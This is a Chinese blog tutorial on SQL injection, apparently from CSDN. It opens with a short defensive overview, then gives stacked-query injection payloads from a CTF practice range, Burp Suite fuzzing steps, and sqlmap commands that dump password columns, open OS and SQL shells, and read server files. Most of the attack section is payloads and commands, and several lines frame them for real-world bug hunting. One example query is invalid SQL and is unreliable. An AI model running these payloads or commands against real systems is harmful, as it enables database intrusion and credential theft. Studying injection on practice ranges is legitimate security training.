SQL注入(SQL Injection)是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库发送恶意的SQL查询,从而绕过身份验证、获取敏感数据或者对数据库进行修改。SQL注入通常发生在与数据库交互的Web应用程序中,尤其是那些直接将用户输入拼接到SQL查询语句中的应用程序。
攻击者利用SQL注入漏洞时,常常通过在输入字段中插入SQL代码来干扰、扩展或篡改原始SQL查询的执行。这种攻击可以使攻击者获得未经授权的数据访问权限,例如用户凭证、个人信息或者敏感业务数据。在最严重的情况下,SQL注入可能导致整个数据库的破坏或者数据泄露事件。
为了防止SQL注入攻击,开发人员应采取一些安全措施,包括但不限于使用参数化查询、输入验证、编码输出、最小权限原则和安全漏洞扫描等。同时,定期审查和更新应用程序的代码以及使用Web应用程序防火墙等安全工具也是有效防御SQL注入攻击的重要措施。
常见的sql注入漏洞
方法一:手工注入
第一步:先看看是否有注入点(拿靶场为例子)
1' or '1' = '1
一个简单的万能密码也是爆出了很多东西,这种情况说明存在注入点。
第二步:开始查询数据库
可以通过分号注入多条sql注入语句,三段分号分为三段语句。
1';show databases;#
一下爆出这么多信息,一般在实际挖洞过程中到这一步可以止步了,因为可以避免不必要的麻烦。
第三步:爆表
0';show tables;#
中途要改参数,因为如果是1';show tabales;#会触发1';多爆出两段列表二里的内容,列表一般是从0开始,所以建议过程中还是改改参数,实施精准打击。
看看就因为第一个参数差距还是很明显的,爆出两个表后挨个挨个在看看里面藏了啥。
第四步:爆出表里的信息
0';show columns from `1919810931114514`;#
这里要普及一个知识点:表名为数字时,要用反引号把数值包括起来查询。(反引号在Esc下面那个键,要用shift切换至英文输入法状态)
还要查询下words表里的信息。
0';show columns from words;#
查询这些信息的内容
0';select flag from tables where columns = words;
但是这个靶场select被过滤掉了,但是实际情况可以这样写。
以上是简单的sql注入流程,但是能查到数据库就收手。
方法二:懒人法(fuzz模糊查询)
直接用burpsuite抓包跑字典,全程主打一个懒。(没有burpsuite的可以私聊我,99.99%的黑客都会使用到的工具)
开始还是同样的步骤看是否有注入点。
鼠标右键选择intruder爆破。
先clear一下。
add添加到爆破模块。
点这里选择字典。
开干。
在看看不同的状态码。
出现这种报错,也可以说明有注入点。
这里说明select,updata,delect,drop,insert,where都是被过滤的对象。
接着就是重复步骤了,爆库,爆表,爆表信息。
爆表。
爆信息就可能要止步了,因为你不知道他的表内信息,前面的表名是因为写mysql时的默认参数,但考虑到很多情况,很多时候都是止步爆库。
方法三:sqlmap
我基本不使用sqlmap,虽然sqlmap很强大,但是有句话说的好,用sqlmap是没有灵魂的,多玩玩手工注入。
1.判断当前网站是否能被攻击(sql注入)
sqlmap -u 'url'
2.获得当前数据库
sqlmap -u 'url' --dbs 获得所有数据库
sqlmap -u 'url' --current-db 获得当前数据库
3.获得某个数据库里面的表信息
sqlmap -u 'url' -D jrlt --tables
4.获得表的列信息
sqlmap -u 'url' -D jrlt -T users --columns
5.获得具体的数据
sqlmap -u 'url' -D jrlt -T users -C password --dump
sqlmap -u 'url' -D jrlt -T users -C name,password --dump
扩展
sqlmap -u 'url' --sql-shell
弱密码爆破
sqlmap -u 'url' --password
执行系统命令
sqlmap -u 'url' --os-shell
读取文件
sqlmap -u 'url' --file-read "D:\e.txt"
sql测试
sqlmap -u 'url' --dbs
sqlmap -u 'url' --dbs
标签:sqlmap,SQL,--,sql,漏洞,url,讲解,注入 From: https://blog.csdn.net/Lenovoliao/article/details/137611884本文章仅作为技术分享,请不要拿去做然后违法的事,后果既往不咎!!!